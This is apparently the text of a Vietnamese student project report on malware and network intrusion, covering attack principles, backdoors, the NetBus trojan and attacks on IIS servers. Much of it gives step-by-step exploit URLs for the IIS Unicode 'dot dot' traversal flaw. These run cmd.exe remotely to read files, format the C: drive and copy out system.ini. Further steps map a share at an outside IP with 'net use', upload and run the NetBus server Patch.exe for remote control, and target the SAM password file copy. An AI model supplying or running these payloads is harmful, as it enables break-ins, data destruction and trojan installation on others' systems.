NỘI DUNG CHÍNH Chương 1: MỘT SỐ PHƯƠNG PHÁP TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG Chương 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG TRÊN MẠNG Chương 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM... Thực trạng tấn cô
Trang 1BÁO CÁO ĐỒ ÁN
NGÀNH CÔNG NGHỆ THÔNG TIN
Đề tài:
TÌM HIỂU MỘT SỐ PHẦN MỀM PHÁ HOẠI &
CÁC GIẢI PHÁP XÂM NHẬP MẠNG DÙNG RIÊNG
CÓ KẾT NỐI INTERNET
Giáo viên hướng dẫn: TS Hồ Văn Canh Sinh viên : Vũ Thị Thu Hằng Lớp : CT702
BỘ GIÁO DỤC VÀ ĐÀO TẠO
TRƯỜNG ĐH DLHP
Trang 2NỘI DUNG CHÍNH
Chương 1: MỘT SỐ PHƯƠNG PHÁP TẤN CÔNG
VÀ KỸ THUẬT XÂM NHẬP MẠNG Chương 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG
TRÊN MẠNG Chương 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM
Trang 4Thực trạng tấn công của tội phạm trên mạng
Phần lớn các cuộc tấn công trên mạng được thực hiện thông qua việc sử dụng một hoặc nhiều công cụ phần mềm
Trang 5Các phương pháp tấn công
Tấn công trực tiếp
Nghe trộm
Giả mạo địa chỉ
Vô hiệu hoá các chức năng của hệ thống mục tiêu
Sử dụng lỗi của người quản trị hệ thống
Trang 7Chương 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG
TRÊN MẠNG
Phát hiện điểm yếu trong cơ chế bảo mật của đối phương
Triệt để lợi dụng cửa sau để tấn công
Tận dụng các công cụ sẵn có
Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
Nguyên tắc an toàn
Nguyên tắc phối hợp tấn công
Trang 8Phát hiện điểm yếu trong cơ chế bảo mật
của đối phương
Một hệ thống đảm bảo ANAT máy tính gồm :
Yếu tố tổ chức.
Yếu tố kỹ thuật, công nghệ.
Có hai hướng tiếp cận để tìm các lỗ hổng bảo mật:
Trang 9Triệt để lợi dụng cửa sau để tấn công
Việc đột nhập vào một hệ thống máy tính nào đó nói chung là rất khó khăn, vì thế sau khi đột nhập người ta muốn để lại một công cụ nào đó giúp dễ dàng xâm nhập trong những lần sau
Backdoor / Trojan.
Nguyên tắc hoạt động của Backdoor
Máy tấn công
Máy đích
Giao tiếp bình thường
Giao tiếp cửa sau
Hình 3.1.1:Mô hình hoạt động của backdoor
Trang 11Value data C:\windows\patch.exe
Trang 12Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
Phương pháp tấn công IIS server bằng cách lợi dụng lỗi Unicode “dot dot directory traversal attack” (tấn công bằng cách lần ngược thư mục do lỗi “dot dot”)
http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+dir+c:\
Thay xâu con “ /”, “ \” bởi xâu unicode chứa một đoạn mã hóa rất dài của ký tự “/” “\” như “%c1%1c”,
“ c0%f9”…
Trang 13Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
Khi thực thi, xâu “%c1%1c” được dịch trở lại nguyên dạng ký tự “/”.
http://www.iisaffected.com/scripts/ / /winnt/system32/cmd.exe?/c+dir+c:\
Để xem nội dung file autoexec.bat:
http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+type+c:\autoexec bat
Để format lại ổ đĩa C:
http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+format+c:\+/q
Trang 14Khai thác tối đa điểm yếu của mục tiêu tấn công,
đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ
Cũng có thể chiếm quyền ghi đĩa và thực hiện sửa đổi, tạo mới file trên server:
+ Bước 1: Tạo một bản sao mới cmd1.exe của trình thông dịch lệnh DOS:
http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+copy+c:\winnt/system32/cmd.exe+c/
winnt/system32/cmd1.exe
+ Bước 2: Ghi thêm một số lệnh vào file autoexec.bat: http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+echo+>>+c:\autoexec.bat+@echo+Hihi
Trang 15Hình 3.5.1: Mô hình giao tiếp giữa hai máy thông qua proxy.
phương Gửi yêu cầu
Trả lời
Gửi yêu cầu
Trả lời
Trang 16Nguyên tắc phối hợp tấn công
Khám phá điểm yếu, lỗ hổng bảo mật trong hệ thống mục tiêu
Sử dụng các công cụ để khai thác các điểm yếu của hệ thống mục tiêu
Tiến hành các biện pháp tấn công,
thu thập thông tin
Tạo đường ngầm (cửa sau), cài cắm “điệp viên” nếu có thể
Xóa dấu vết Ngụy trang
Hình 3.6.1: Sơ đồ thứ tự áp dụng các nguyên lý tấn công
Trang 17Chương 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU
NETBUS
Trang 18 WS_Ping ProPack (http://www.ipswitch.com)
Chương 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU
Trang 19Chương 4: MỘT SỐ GIẢI PHÁP CỤ THỂ
TẤN CÔNG TRÊN MẠNG MÁY TÍNH
Tấn công máy mục tiêu bằng cách giành quyền điều khiển hệ thống đó
HTTP (HypeTtext Transfer Protocol – giao thức
truyền siêu văn bản)
Giao thức TFTP (Trivial File Transfer Protocol –
giao thức truyền file đơn giản)
Giao thức NetBIOS (Network Basic Input/Output
System)
Kết hợp công cụ quét tài nguyên được chia sẻ và công cụ bẻ mật khẩu
Trang 20Cách download và upload file trên IIS
mắc lỗi Unicode
Khi cài IIS phiên bản từ 4.0 trở lên, FTP server cho phép user truy cập vào thư mục \inetpub\ftoproot\ và download các file từ đó:
+ Bước 1: Copy file download (giả sử là file c:\system.ini) vào thư mục \inetpub\ftoproot\ bằng URL:
http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+copy+c:\system.ini+c:\inetpub\ftoproot\
+ Bước 2: Sử dụng FTP vô danh đăng nhập vào máy tính đích download file system.ini về
Trang 21 Windows NT và Windows 2000 lưu trữ một
bản sao file SAM (Security Account Manager)
trong thư mục \WINNT\repair\, lưu trữ thông tin
về account sử dụng hệ thống đã được mã hóa
Trang 22Cách download và upload file trên IIS
mắc lỗi Unicode
Bước 1: Chia sẻ một ổ đĩa trên máy của mình, ổ C: , với quyền truy nhập là “Full” và không có pass bảo vệ.Tên
chia sẻ (Share name) được đặt là “My Disk”
Bước 2: Sử dụng lệnh “net use” trên IIS để ánh xạ (map)
“My Disk” (tức là ổ đĩa C: trên máy của mình) về thành
một ổ đĩa mới trên máy chủ phía đích, ổ G:
http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+net +use+G:+\\203.160.1.94\MyDisk
Trang 23trình duyệt copy lên đĩa cứng thực sự của server
Trên ổ C: của người ta có Trojan netbus 1.7 với thành phần server là Patch.exe, người ta sẽ thực hiện lệnh sau ở trình duyệt: http://www.iisaffected.com/scripts/
%c1%1c /winnt/system32/cmd.exe?/c+copy+g:\
Patch.exe+c:\Patch.exe
Trang 24Cách download và upload file trên IIS
mắc lỗi Unicode
Bước 4: Dùng lệnh “net use G:/delete” trên server để
http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+net+use+g:+\delete
Bỏ việc “share” ổ đĩa C: để đảm bảo an toàn
Bước 5: Chạy thành phần server của chương trình điều khiển từ xa trên máy đích thành phần client trên máy của
ta, kết nối vào và điều khiển máy đích
Trang 25Kết hợp công cụ quét tài nguyên được
chia sẻ và công cụ bẻ mật khẩu
Để quét tài nguyên được chia sẻ trên máy mục tiêu, dùng phần mềm WS_Ping ProPack với công cụ Scan
Để truy cập đến tài nguyên đó:
Run\\<địa chỉ IP>\<tên tài nguyên>
câu lệnh C:\net view <địa chỉ IP>
Nếu tài nguyên được chia sẻ không có mật khẩu thì
truy nhập : net use <ổ đĩa bất kỳ trên máy của bạn > :
<ổ share của nạn nhân >
Trang 26Kết hợp công cụ quét tài nguyên được chia
Trang 27KẾT LUẬN
vấn để vô cùng rộng, thời gian ngắn và trình độ có hạn nên
đồ án còn nhiều hạn chế và chưa giải quyết trọn vẹn yêu cầu đề tài nêu ra
chế để đề tài ngày càng hoàn thiện hơn và tạo ra sản phẩm phần mềm - công cụ ứng dụng trong công nghệ xâm nhập
Em xin chân thành cảm ơn !